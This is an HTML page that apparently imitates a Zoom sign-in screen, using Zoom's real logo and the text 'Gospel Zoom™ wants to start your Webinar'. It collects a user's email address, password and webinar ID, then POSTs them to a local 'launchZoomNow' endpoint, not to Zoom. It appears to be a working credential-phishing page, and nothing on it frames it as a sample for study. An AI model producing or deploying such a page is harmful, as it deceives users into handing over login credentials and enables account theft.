<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <title>Sign In - Zoom</title>
    <style>
html, body {
    margin: 0;
    padding: 0;
    width: 100%;
    height: 100%;
    font-family: 'Lato','Helvetica','Arial';
    font-size: 13px;
    color: rgb(120, 120, 120);
    overflow-x: hidden;
}
.logo {
    width: auto;
    height: 100%;
}
.header {
    padding: 13px;
    height: 24px;
    width: 100%;
    border-bottom: solid rgb(231, 231, 231);
    border-bottom-width: 1px;
    position: relative;
}
.header-link {
    color: #2073D9;
    position: absolute;
    top: 50%;
    -ms-transform: translateY(-50%);
    transform: translateY(-50%);
    font-size: 12px;
    font-weight: 500;
}
#body {
    padding: 15px;
}
#title {
    font-size: 24px;
    color: #595959;
    font-weight: 400;
}
.formInput {
    margin-top: 8px;
    width: calc(100% - 22px);
    border-radius: 7px;
    padding: 10px;
    border: 1px solid rgb(120, 120, 120);
}
input:focus {
    outline: none;
    border: 1px solid #739CD9;
}
l {
    color: rgb(14, 113, 235)
}
.submit {
    border: none;
    background-color: rgb(14,113,235);
    color: white;
    width: 100%;
    border-radius: 7px;
    padding: 12px;
    font-size: 16px;
}
.submit:active {
    background-color: rgb(14, 98, 200);
}
.submit:disabled {
    background-color: rgb(122, 180, 251);
}
.container {
    width: 92%;
    height: auto;
    margin: 0;
    padding: 0;
    overflow: hidden;
    transition: transform 0.4s ease;
    transform: scaleX(1);
    position: fixed;
    top: 150px;
}
.hidden {
    transform: scaleX(0);
}
#previousBtn {
    display: inline-block;
    padding: 8px 16px;
    background-color: #f1f1f1;
    border: none;
    border-radius: 3px;
    box-shadow: 5px 5px 8px -8px black;
}
    </style>
</head>
<body>
    <div class="header">
        <img class="logo" src="https://st1.zoom.us/static/6.1.5948/image/new/ZoomLogo.png" alt="Zoom Logo">
        <a class="header-link" style="right:80px">HOST</a>
        <a class="header-link" style="right:140px">JOIN</a>
        <a class="header-link" style="right:50px; font-size: 20px; font-weight: 100;">
            <i class="fa fa-bars"></i>
        </a>
    </div>
    <div id="body">
        <a id="title">Sign In</a>
        <div style="height: 5px;"></div>
        <a>Gospel Zoom&trade; wants to start your Webinar</a>
        <br><br>
        <hr style="
        border: none;
        background-color: rgb(231, 231, 231);
        height: 1px">
        <br>
        <form action="launchZoomNow" method="POST">
            <div class="container" id="emailAndPass" style="transform-origin: left;">
                <label for="email">Email Address</label>
                <input class="formInput" oninput="checkSignInValid()" name="email" id="emailInput" type="email" placeholder="Email Address">
                <br><br><br>
                <label for="password">Password</label>
                <input class="formInput" oninput="checkSignInValid()" name="password" id="passInput" type="password" placeholder="Password">
                <br><br><br>
                <a>By signing in, I agree to the <l>Zoom's Privacy Statement</l> and <l>Terms of Service.</l></a>
                <br><br>
                <button id="signInBtn" type="button" class="submit" onclick="transitionToWebId()" disabled>Sign In</button>
            </div>
            <div class="container hidden" id="idContainer" style="transform-origin: right;">
                <label for="webinarid">Webinar Id</label>
                <input oninput="makeSureValidWebId()" id="webinarid" class="formInput" name="webinarid" type="number" placeholder="Webinar Id">
                <br><br>
                <button id="launchBtn" type="button" class="submit" onclick="saveWebIdAndLaunch()" disabled>Launch</button>
                <br><br>
                <button type="button" id="previousBtn" onclick="previousPage()">← Go Back</button>
                <br><br>
            </div>
        </form>
    </div>
    <script>
Storage.prototype.setObject = function(key, value) { 
    this.setItem(key, JSON.stringify(value)); 
}
Storage.prototype.getObject = function(key) { 
    var value = this.getItem(key);
    return value && JSON.parse(value); 
}
function _(x) {return document.getElementById(x);}

let webId = null;
const webinarid = _('webinarid');
const launchBtn = _('launchBtn');
const emailInput = _('emailInput');
const passInput = _('passInput');
const emailAndPass = _('emailAndPass');
const idContainer = _('idContainer');
const signInBtn = _('signInBtn');
function checkSignInValid() {
    if (!emailInput.checkValidity() || emailInput.value == '' || passInput.value == '') {
        signInBtn.disabled = true;
        return false;
    }
    signInBtn.disabled = false;
    return true;
}
function transitionToWebId() {
    if (checkSignInValid()) {
        emailAndPass.classList.add('hidden');
        idContainer.classList.remove('hidden');
    }
}
function previousPage() {
    emailAndPass.classList.remove('hidden');
    idContainer.classList.add('hidden');
}
window.onload = ()=>{
    webId = localStorage.getObject('webId');
    webinarid.value = webId;
    makeSureValidWebId();
}
function saveWebIdAndLaunch() {
    let thisWebId = webinarid.value;
    webId = parseInt(thisWebId);
    localStorage.setObject('webId', webId);
    document.forms[0].submit();
}
function makeSureValidWebId() {
    launchBtn.disabled = (webinarid.value.toString().length != 11);
}
    </script>
</body>
</html>